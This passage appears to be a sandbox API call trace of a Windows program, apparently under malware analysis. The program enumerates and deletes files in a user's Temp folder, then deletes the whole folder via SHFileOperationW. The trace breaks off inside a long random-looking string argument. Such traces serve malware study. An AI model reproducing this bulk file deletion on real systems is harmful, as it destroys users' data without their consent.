nFileSizeLow=0x10f0a, dwReserved0=0x11a6, dwReserved1=0x4, cFileName="ADxC8B8gecbq.gif", cAlternateFileName="ADXC8B~1.GIF")) returned 1 [0250.085] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\ADxC8B8gecbq.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\adxc8b8gecbq.gif")) returned 1 [0250.086] FindNextFileW (in: hFindFile=0xaa5820, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8f07f000, ftCreationTime.dwHighDateTime=0x1d4ca55, ftLastAccessTime.dwLowDateTime=0x44b0f460, ftLastAccessTime.dwHighDateTime=0x1d4c830, ftLastWriteTime.dwLowDateTime=0x44b0f460, ftLastWriteTime.dwHighDateTime=0x1d4c830, nFileSizeHigh=0x0, nFileSizeLow=0x2b4f, dwReserved0=0x11a6, dwReserved1=0x4, cFileName="CA6QdAYZSgwgrGFe.m4a", cAlternateFileName="CA6QDA~1.M4A")) returned 1 [0250.086] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\CA6QdAYZSgwgrGFe.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\ca6qdayzsgwgrgfe.m4a")) returned 1 [0250.087] FindNextFileW (in: hFindFile=0xaa5820, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1f38a400, ftCreationTime.dwHighDateTime=0x1d4d1f7, ftLastAccessTime.dwLowDateTime=0x72460f80, ftLastAccessTime.dwHighDateTime=0x1d4d485, ftLastWriteTime.dwLowDateTime=0x72460f80, ftLastWriteTime.dwHighDateTime=0x1d4d485, nFileSizeHigh=0x0, nFileSizeLow=0xb9dd, dwReserved0=0x11a6, dwReserved1=0x4, cFileName="CFbZZec.wav", cAlternateFileName="")) returned 1 [0250.087] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\CFbZZec.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\cfbzzec.wav")) returned 1 [0250.088] FindNextFileW (in: hFindFile=0xaa5820, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd97d7f40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97d7f40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd97d7f40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x11a6, dwReserved1=0x4, cFileName="Cookies", cAlternateFileName="")) returned 1 [0250.088] FindNextFileW (in: hFindFile=0xaa5820, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf77ec9a0, ftCreationTime.dwHighDateTime=0x1d4cd7b, ftLastAccessTime.dwLowDateTime=0xc7678930, ftLastAccessTime.dwHighDateTime=0x1d4d1c9, ftLastWriteTime.dwLowDateTime=0xc7678930, ftLastWriteTime.dwHighDateTime=0x1d4d1c9, nFileSizeHigh=0x0, nFileSizeLow=0x584b, dwReserved0=0x11a6, dwReserved1=0x4, cFileName="D wh4VfOO6Jk37Uyl w.gif", cAlternateFileName="DWH4VF~1.GIF")) returned 1 [0250.088] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\D wh4VfOO6Jk37Uyl w.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\d wh4vfoo6jk37uyl w.gif")) returned 1 [0250.089] FindNextFileW (in: hFindFile=0xaa5820, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x334c98a0, ftCreationTime.dwHighDateTime=0x1d4c678, ftLastAccessTime.dwLowDateTime=0x576f1590, ftLastAccessTime.dwHighDateTime=0x1d4d100, ftLastWriteTime.dwLowDateTime=0x576f1590, ftLastWriteTime.dwHighDateTime=0x1d4d100, nFileSizeHigh=0x0, nFileSizeLow=0xabd1, dwReserved0=0x11a6, dwReserved1=0x4, cFileName="Dhz7QP_52loTO-.jpg", cAlternateFileName="DHZ7QP~1.JPG")) returned 1 [0250.089] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Dhz7QP_52loTO-.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\dhz7qp_52loto-.jpg")) returned 1 [0250.090] FindNextFileW (in: hFindFile=0xaa5820, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x23c94940, ftCreationTime.dwHighDateTime=0x1d4cb60, ftLastAccessTime.dwLowDateTime=0x18cd3720, ftLastAccessTime.dwHighDateTime=0x1d4cf81, ftLastWriteTime.dwLowDateTime=0x18cd3720, ftLastWriteTime.dwHighDateTime=0x1d4cf81, nFileSizeHigh=0x0, nFileSizeLow=0xda7, dwReserved0=0x11a6, dwReserved1=0x4, cFileName="DPBFvKKs.flv", cAlternateFileName="")) returned 1 [0250.090] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\DPBFvKKs.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\dpbfvkks.flv")) returned 1 [0250.090] FindNextFileW (in: hFindFile=0xaa5820, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x21d211d0, ftCreationTime.dwHighDateTime=0x1d4c539, ftLastAccessTime.dwLowDateTime=0x6f35d500, ftLastAccessTime.dwHighDateTime=0x1d4c5ad, ftLastWriteTime.dwLowDateTime=0x6f35d500, ftLastWriteTime.dwHighDateTime=0x1d4c5ad, nFileSizeHigh=0x0, nFileSizeLow=0xe7df, dwReserved0=0x11a6, dwReserved1=0x4, cFileName="FGs-gQI.gif", cAlternateFileName="")) returned 1 [0250.091] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\FGs-gQI.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\fgs-gqi.gif")) returned 1 [0250.091] FindNextFileW (in: hFindFile=0xaa5820, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x33d9ad10, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x33d9ad10, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x11a6, dwReserved1=0x4, cFileName="FXSAPIDebugLogFile.txt", cAlternateFileName="FXSAPI~1.TXT")) returned 1 [0250.091] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\fxsapidebuglogfile.txt")) returned 0 [0250.091] FindClose (in: hFindFile=0xaa5820 | out: hFindFile=0xaa5820) returned 1 [0250.092] GetLastError () returned 0x20 [0250.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0250.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0250.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0250.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0250.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0250.092] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0250.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0250.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0250.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0250.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0250.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0250.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0250.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0250.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0250.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0250.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0250.093] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0250.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0250.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0250.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa670 [0250.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0250.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0250.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4f0 [0250.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0250.093] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0250.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0250.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0250.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0250.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0250.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0250.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0250.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0250.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0250.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0250.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0250.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0250.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0250.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0250.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0250.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0250.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0250.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24207f0 [0250.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0250.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0250.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0250.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0250.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0250.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0250.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0250.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0250.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0250.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0250.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0250.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0250.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0250.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0250.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0250.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0250.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0250.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0250.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0250.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0250.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x62) returned 0x2417000 [0250.095] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Temp", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp", lpFilePart=0x8bf658*="Temp") returned 0x30 [0250.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2417000 | out: hHeap=0x25c0000) returned 1 [0250.095] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp")) returned 0x2010 [0250.095] SHFileOperationW (in: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x560c\x10d5\xd991\x7d87\x7ba3\x4a8f\x8385\x59af\x34ad\x15b5\x5ed3\x9837\x3dd3\xf78c\xecc0\xecbd\x6c87\xf7ec\x5aaf\x925\x6a96\x9603\xf0ea\x5640\x1fde\x6b28\xcc1f\x719a\xaca\xd623\xbec4\x231d\x6249\xce0e\x5196\xb6a2\x6478\xc70f\xa471\x6ced\x38df\x4a94\x281a\xf0a0\xb3ee\xea2d\x20e8\x6b84\xdd1a\x824e\x5db3\x305a\x3d2f\x858\x867c\x2238\xa0d6\x3f42\xab52\x8f46\x95f3\x583c\xd58\x571d\x8772\x3fb5\x7b84\x30c1\x7b75\xb251\x37ca\x6e8d\x2979\xb8a0\xfabd\x8133\x4938\x9f74\x4ad9\x115b\x2a07\xeaf7\x3483\x4f5a\xa1f7\xf2a0\x702d\x48db\x98b4\x27fa\xa2b8\x811c\xfe6e\xa018\x8dd\x4e35\x81cb\x206b\x9009\x7d4f\x5ef6\xfd84\x601e\xc0b1\xc8eb\xa9b4\x727d\xb6b4\xc028\x56c\x67de\x4e37\x35b\xc5d7\x2d0a\xb487\xac20\x8d34\xa16c\x8327\x9880\x85fa\xd390\xc919\x8ce9\x8326\xf2d6\x698a\x8803\xc042\x9f06\x5777\xd189\x442d\x515b\x79dd\x1ed\x96b4\x389c\xfe44\xee8c\xa029\xaf84\xe75f\x6624\xc54d\xfd5e\x57ae\x313\xf8df\xcdab\xfc33\x956f\x8b7f\xf324\x72bf\x9d42\xb9b8\xd461\x3438\xeeb\x6272\x3faf\x8f7b\xe47f\x1d3e\xb474\x6ec2\x37c8\xa2b5\x9f4b\x6a44\x70bf\x7bc2\xbc2e\x155f\xbf79\xde18\x8907\xa4d7\xae8a\x26c0\xf212\x66ca\x7e1d\xe19f\x3fdf\xeff0\xf9ef\x69f7\x7dfe\x7f8a\xe49f\xdddf\xbf9c\xd10b\xba35\xaf3d\xd864\xff87\x417\x8cec\x8cd4\x62ff\x703f\x5125\xfb46\x206a\x52fe\x1f8c\xd05d\xb00a\xf9cb\xfab\xba74\x4e82\xd3dc\xd819\x7165\xfdea\xef70\x2b86\xa030\xcedb\x32ce\xf30b\x6848\x13a6\x9acd\x95c1\x48c\xe8ef\xd334\xd83e\xb625\x8390\x273e\xf2ee\x72e3\xb434\xeacb\x24d8\xfde5\xd646\xc1ed\xf682\xa70\xb5f5\x8943\xb78a\xe836\xf76b\x5f52\x9d1b\x9db9\xd416\xa168\x7682\xed33\x908f\xb5d\xeedd\xeb9e\x73a7\xfdd2\x3974\xf320\x77a7\xed44\x4e4e\x75c\x67d3\xd2dd\x8423\x74ab\xa59\xe208\xd07e\xe81f\x2f1\x61be\x46c9\xa214\x6399\x5b80\xe0b\xca4\x8337\x45fc\x9d13\x1db8\x603f\x82b\xebc7\xd6fd\x1cbb\x459e\x55b6\xf5ff\x722c\x6eac\x53f7\x1b85\x8087\x235\xc4ff\x8bca\x9df2\x3a5e\x4525\x7ab3\x85dd\xea5e\x6ecc\xc1f2\x381a\x1fc8\x4c2a\x4521\xbf16\x9b67\x6c9e\x12d6\xdb63\xd500\x54d3\xc72\x4abe\xf79f\x9b53\x849b\x8252\x22fe\xaad\x2306\x2645\xbec1\x6948\xcf7c\x2e6d\xf5a1\x423d\x40b4\x4126\x406f\xbb1\x47a1\xe9c5\xb824\xd5cc\x25d3\x70fa\xdf0a\xe4f8\xd313\xe84c\x1f01\x38fd\x8bbb\x3769\x8ac3\x3b48\x4d2b\xe920\x2ed7\xb242\x8199\x5206\x7baf\x3d2e\x1aa8\xa649\x386a\xe84c\x65ec\xbd1a\xa1c3\x2d15\x7a77\x9343\x29cd\xa8d8\x8d90\xf44e\x39e8\x55b6\xf889\xac70\xa872\xf74\x2974\x11f0\xea4c\xa105\xb009\xcfa\x2328\x69d0\xba12\x3d66\x6b1\xd91c\x717b\xdacb\xdd97\x8a44\x38a6\xd6fd\x6226\x702d\xbda0\xa155\x6d13\xf2b9\x11aa\xa274\x5723\xadb5\xe21e\x5cf5\x22bc\xebcd\xdbb9\x5ab6\x8d51\x331c\x5560\xce83\x5a10\x2c2b\x36e6\x51bf\xc03b\xb073\x6de4\x4a95\xb746\xd209\x2867\x5225\xad87\x588a\x8e7d\x9270\xb86a\xd524\x8118\x9402\x3850\x43ee\x4385\x7b17\xb341\xb4e3\x1e8e\x27f9\x93c2\x1a5c\x302c\x7c85\xf1bf\xf60b\x6719\x705\xa640\xc505\x658b\x4dc\xe112\x295d\x33b4\xa97c\xccd9\xae92\xbbe4\xcf1f\x5a11\xc196\x1e77\xd652\xa293\x4e49\x6d62\x3cf4\x5b68\xf765\xe83c\x9558\xfc00\xec\x14f4\x2386\x3541\xcc9a\xcdb0\xfd4b\xbe36\x77d5\xb900\x74c7\x7312\xc19a\x61f6\x90ab\x9c1f\x2647\x3cb\xe3fc\x5ae\x28dc\xabfa\x702b\x7aad\x8736\xc90b\x59c3\x619\xf4e9\xd41c\x963b\xf069\xdc55\x3200\x5881\xd744\xc967\xb35c\x6943\x4b81\xc80e\x40a5\xe10c\xa05b\xd807\x3f7c\x3a2c\x3c79\xa3ff\x32ee\x77ce\xd5b8\xf71f\x4571\xa105\x197c\x589b\x20d8\x5647\xbc84\x22bb\xa638\x905\xe9e7\xc224\xa7d4\xe773\x7a1c\x98c8\x6db\x9315\x8076\xf631\xcb9f\x9711\xdaca\xb125\x83c2\xa7cc\xad9a\x3cd0\x27ee\x961a\xc100\x5050\xdb9c\xe6db\x824c\xd8fd\x2f5f\x4547\x59f5\xd417\xda5a\xfd97\x430e\xab4\xc043\x9b42\x7048\x838a\x2f05\xa3e7\x92e0\x1de3\xe2c8\xa7f5\x6c93\x2f01\x1aa4\xe893\xb676\xa41f\x3647\x979d\x73c4\xfb85\xeea0\x9832\x39d0\x5c0e\xbf72\xff66\x2a1a\x6bc5\xec11\x9e52\xa76\x85cc\xf9a8\x88d3\xaa8e\x78f0\xed31\x9d42\xf114\x3227\x7c79\x5c56\x8f7c\xfd1d\xe7d\x1f5c\x38a9\x877\x2da0\x69d\xef15\x7c0d\x780d\x9a2d\x5d9f\xee13\xcf8a\xa7f3\xde4c\x48c5\xd845\x1ebf\x3ad8\xcb01\x838a\x24cd\xd7a1\x85dc\x5b20\xf290\x1ba3\x36f8\xfd9a\xd9f6\x8f11\xcaa8\x6d17\x1338\x754f\xb8db\xf544\x11d6\x436e\x6946\x4b2a\x4a71\x938a\x9538\xb27e\xcce2\x2973\xfcfd\x84e\x2966\x54fd\x8417\x20f3\x290c\x2148\xf384\x3c20\xc217\x8a85\x8ab3\x671b\xa9fa\x2173\x780a\xd949\x117a\x562c\x5fa\x1a39\xcb05\x73d7\x43f3\xd432\x2035\x623f\x278c\xb2b4\xab1d\xce0f\xf32c\xfed3\x3518\x1497\x3255\x9b\x42f\x2770\x1236\x8bde\x6231\xf299\xa566\xc764\xd08\x3270\xabe8\xd3f2\x7909\x74a8\x967\x8f6f\xaf90\xf915\xae08\xa4ac\xb7c1\x65de\xf5ff\xd060\x1ba3\xdfb0\xec21\xc92d\xc9de\x615e\x1a38\x71db\xe234\x7cf9\x590f\xe21d\x7ea4\xb71c\xaaa\xb5d9\x7197\x824a\x5f09\x638f\x2ece\xe1e1\x3959\x3a11\x362\x3c05\x4bc7\x9c2d\x6bad\x59b4\x72b3\x403c\xb346\x8b9b\xa8e2\x6037\x34f3\x22a1\x3034\xa279\xaac0\x5908\xa09\xc98a\x2146\xeffb\x7266\xfce1\xc993\x5c\xee7d\x9436\xed71\xb319\x9430\x795a\xd71b\x1f9c\x9113\x4473\xb3e4\xb222\x445c\xe6ee\xf691\x22e5\x2354\x594a\x4229\xcc5f\xa1e4\x22a5\x4e34\x1e84\xa114\x2281\xa2df\xb8db\x6057\xef54\xdbbd\xb081\x1f89\x5249\xeabd\xadc4\x21d\x513\xf6d8\xa91f\x9bb7\x2426\xf8ba\x4923\xb024\xa488\xac2a\xb5db\x3871\x291f\xd4eb\x5287\xe1c4\x9313\xa1b1\xbbd\x482\x3e87\x7b14\x1f48\x514a\x347d\xbf42\x6d11\xbf51\x6d98\x7743\xd5ea\x494e\x8587\x16ef\x2a07\x3311\x7d90\xdbc0\xc724\xceb9\xbd82\x3b6c\x3fcb\xb38c\x3ced\xc52c\x76d9\x1cf6\x8f3b\x76d\x9165\x6719\xbc09\x1e88\x774\x2c7a\xe82e\x2cc2\x4dd\x6e45\x1b8b\x3d9b\x41d1\x5eb8\xba13\xe645\x909e\x6c8d\x8c1a\xfd72\xa744\xb67c\x47a7\x5c74\x1eca\x3742\x438b\x1f7a\xfd42\x660e\x2ee3\x4512\xa90e\xdf3e\x9319\x8db7\xf887\xb5c8\x207e\xdba1\xeaa5\x8ba8\x9e3\xda66\xedc9\xa1a0\x8171\x3ed9\x751\xdf09\x5337\xf668\x9076\x8de3\x63f1\x4a20\x240a\x4f1\x32ec\x6d00\x63ea\x8493\xa119\x2ea3\x6fb2\x3b85\xb8b2\xbb19\x1069\xfa26\xeffc\x375c\xdc4b\x4e84\xbb7d\x346\xe2a\x7f\xbd8a\x536\xe58b\x6d18\x284f\x9446\x2ae1\xd6e\x8c0c\xe9fd\xd007\x62dc\xeaff\x8e01\x7388\xf1b9\x3905\xd079\xf3e\x1aa2\xd7ec\xc43\xdb56\xbf60\xb166\x2950\xec1b\x4437\xaade\xb951\x8b24\x106a\xafe7\x9cc5\x360d\xd2d9\x9e2b\xfea6\x3a69\xac16\x5cd9\x48d1\xcd18\xdfd4\x2344\xe321\xc3ae\x70d0\xca86\xb1ad\xa73d\xfcee\x78fe\x5b20\x4281\x2a6a\x832f\xfce\x2d59\x15bc\xa7b3\xb447\x7a7f\x1e98\xd2f2\xe56d\x2cdf\xe7d6\xe7df\x3ba5\xba54\x2d4f\xbcef\xf177\x7f7c\xd7f9\xe693\xe2f\xe650\xae4d\x4d0b\xbd92\xdbc9\xe554\x6dc9\xf96a\x6a37\x5f40\x96a8\x9f1f\x58bf\xd7bf\x7c97\xfca8\x9178\xe05a\x26f5\xca1f\x9e53\xcfac\x526e\xf65e\x7962\xd08d\x1b0c\x92b0\x1f14\xd408\xd337\xf2d6\x3a4f\x346f\xf295\x3553\xb209\x67a4\x9f96\x9b9a\x9160\x91f4\xa7e5\xf18a\xb439\xdb7c\x9386\x83df\xe5da\xea5a\x9b26\x5db0\x897c\xfe55\xa7b0\x8074\xda97\x2fef\x4191\x6986\xbd94\xfb41\xf03d\x4e1a\xb884\xe15b\xf25\xf644\x6aa1\xc7f9\xd292\xa8a9\x27e5\x6525\xb4ae\x1922\xda12\x6120\xc02e\x51ab\xf067\x15b0\xb023\xf455\xd074\xc6e6\xc6f9\x2946\x3f9b\x53ed\x498a\x902d\x2fb4\xf16\x331\xb4a\xec1b\xb4ea\xe8\xe079\xf0d\x2029\x6868\x5